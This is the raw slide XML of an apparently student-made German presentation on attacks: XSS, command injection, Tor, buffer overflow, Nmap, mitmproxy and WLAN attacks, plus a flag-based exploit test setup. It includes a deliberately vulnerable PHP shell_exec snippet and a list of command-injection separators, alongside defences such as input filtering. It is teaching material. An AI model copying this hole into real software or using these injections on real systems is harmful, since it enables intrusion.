        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Gerade Verbindung mit Pfeil 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326837" y="6018951"/>
            <a:ext cx="2831103" cy="1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054553" y="1554010"/>
            <a:ext cx="276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Präparierte URL, z.B. mit Hilfe einer Email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585965" y="2852270"/>
            <a:ext cx="205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Anfrage mit Schadcode in URL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3607644" y="4329011"/>
            <a:ext cx="2206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Antwort mit Schadcode in HTML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644438" y="5763607"/>
            <a:ext cx="159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Scriptcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" smtClean="0"/>
              <a:t> baut HTML </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>mit Schadcode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3415175" y="5695280"/>
            <a:ext cx="2599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Verlust (persönlicher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, sensibler) Daten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464450" y="65826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Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Zandtner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221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Roxychains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&amp; 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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"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Mitmproxy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7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 lnSpcReduction="10000"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>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dokumentation und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wiki</a:t>
            </a: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Teile des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Phyton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-Server für die Annahme der Verbindungen</a:t>
            </a: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Fahrgestellnummer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Aufbau der Nummer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Erstellung der Informationstabellen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:latin typeface="Arial Unicode MS" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Überprüfung mittels </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Regex</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial Unicode MS" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:latin typeface="Arial Unicode MS" charset="0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>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Übersetzer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Übersetzungstabelle bayrisch &lt; &gt; deutsch</a:t>
            </a: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541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3200400"/>
            <a:ext cx="8298000" cy="3311010"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Zugriff durch:</a:t>
            </a:r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>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Unsichere Benutzer Schnittstellen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gründe: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Unsichere</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ausführung: </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Anhängen von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="18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49424" y="2042570"/>
            <a:ext cx="572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smtClean="0"/>
              <a:t>Ausführen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0"/>
              <a:t>von Befehlen auf dem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Hostsystem</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Pfeil nach rechts 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487396" y="1951747"/>
            <a:ext cx="1517904" cy="5817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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ziel</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE">
              <a:solidFill>
                <a:schemeClr val="bg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732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 err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Codebeispiel</a:t>
            </a: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endParaRPr lang="de-DE" sz="18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endParaRPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean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Zugriff über </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty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|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="de-DE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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||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; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="de-DE" sz="4400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="20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68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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786384" y="2355321"/>
            <a:ext cx="6647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Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2C7729"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="393939"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2C7729"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>	echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="393939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2C7729"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>shell_exec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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B2000A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B2000A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cat'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="393939"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="322A90"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="322A90"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>GET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B2000A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>'command'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="393939"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="393939"/>
                </a:solidFill>
                <a:latin typeface="Courier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10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endParaRPr lang="de-DE" sz="4000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="18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69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5516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/>
              <a:t>Dokumentation &amp; HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Anweisungen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Hauptdokumentation als PDF vorliegend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Gemeinsames Dokument mit den anderen Teilgruppen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Gliederung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Szenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Vorbereitungen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>WEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>WPA/WPA2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>WPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Fake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>-AP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Sicherungsmaßnahmen und Bewertung</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Anweisungen für die Demos zusätzlich als HTML Version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Umsetzung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819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Angriff durch Blind Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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Senden einer Mail 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Pingen eines Servers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Schreiben eines Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="360000"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Typische Orte für Schwachstellen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Laden von Bildern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Externe Bibliotheken / Non-native Code (Perl)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000"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Direkte Codeausführung (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr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70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82" y="2758870"/>
            <a:ext cx="640926" cy="64092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40" y="2286430"/>
            <a:ext cx="629920" cy="472440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77" y="3066548"/>
            <a:ext cx="666496" cy="6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74025" y="1792224"/>
            <a:ext cx="8298000" cy="4719186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="360000">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vorkehrungen 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Vermeidung von Parameterübergabe an Betriebssystem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Filterung der Zugriff-Kommandos (z.B.: &amp;&amp;)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="de-DE" sz="4400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> für Zugriffe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Strikte Input-Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Externe und eigene Funktionen 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Limitierung der Eingabe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Verwendung sichererer Programmiersprachen (Java)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" b="1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Command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71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4450" y="6582676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Philipp Weitl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15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Roxychains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&amp; Tor 		Dominik Schlecht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Buffer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Overflow 			Maximilian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Wenzl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Nmap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			Michael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Löckler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Cross Site Scripting 		Stefan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Zandtner</a:t>
            </a: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solidFill>
                <a:srgbClr val="E5E5E5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Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E5E5E5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 		Philipp Weitl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b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mitmproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 				Sebastian Beck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1800" b="1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9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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457661" y="1838188"/>
            <a:ext cx="8228763" cy="27058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de-DE"/>
            </a:defPPr>
            <a:lvl1pPr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b="1" kern="0" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" lvl="1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2000" b="1" kern="0" baseline="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kern="0" baseline="0">
                <a:latin typeface="Arial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kern="0" baseline="0">
                <a:latin typeface="Arial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kern="0" baseline="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Ziel: Automatisiertes Testen der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Scripte</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>setflag.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>getflag.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>exploit.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045291" y="5062230"/>
            <a:ext cx="718413" cy="718413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Flag</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155565" y="3494785"/>
            <a:ext cx="1175584" cy="1110274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Setflag.py</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865940" y="2906993"/>
            <a:ext cx="1175584" cy="1110274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getflag.py</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723011" y="3690716"/>
            <a:ext cx="849033" cy="391861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ID</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723011" y="4147887"/>
            <a:ext cx="849033" cy="391861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Token</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5714973" y="3658060"/>
            <a:ext cx="1175584" cy="1110274"/>
          </a:xfrm>
          <a:prstGeom prst="diamond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exploit.py</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Line 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="0"/>
            <a:endCxn id="42" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1404497" y="4049922"/>
            <a:ext cx="751394" cy="1012635"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 106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48" name="Line 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="3"/>
            <a:endCxn id="44" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3331149" y="3886646"/>
            <a:ext cx="392188" cy="163602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49" name="Line 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="3"/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331149" y="4049921"/>
            <a:ext cx="392188" cy="294223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0" name="Line 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="43" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4572043" y="3462130"/>
            <a:ext cx="294223" cy="424843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1" name="Line 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="45" idx="3"/>
            <a:endCxn id="43" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4572044" y="4017267"/>
            <a:ext cx="881688" cy="326551"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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2" name="Line 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="46" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572043" y="3886646"/>
            <a:ext cx="1143256" cy="326878"/>
          </a:xfrm>
          <a:prstGeom prst="bent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53" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155565" y="5290816"/>
            <a:ext cx="3853304" cy="326551"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4300"/>
              <a:gd name="adj2" fmla="val 75404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endParaRPr lang="de-DE" sz="1633" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1633" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Prüfen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1633" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>des Ergebnis</a:t>
            </a:r>
            <a:endParaRPr sz="1633" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Line 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="3"/>
            <a:endCxn id="56" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
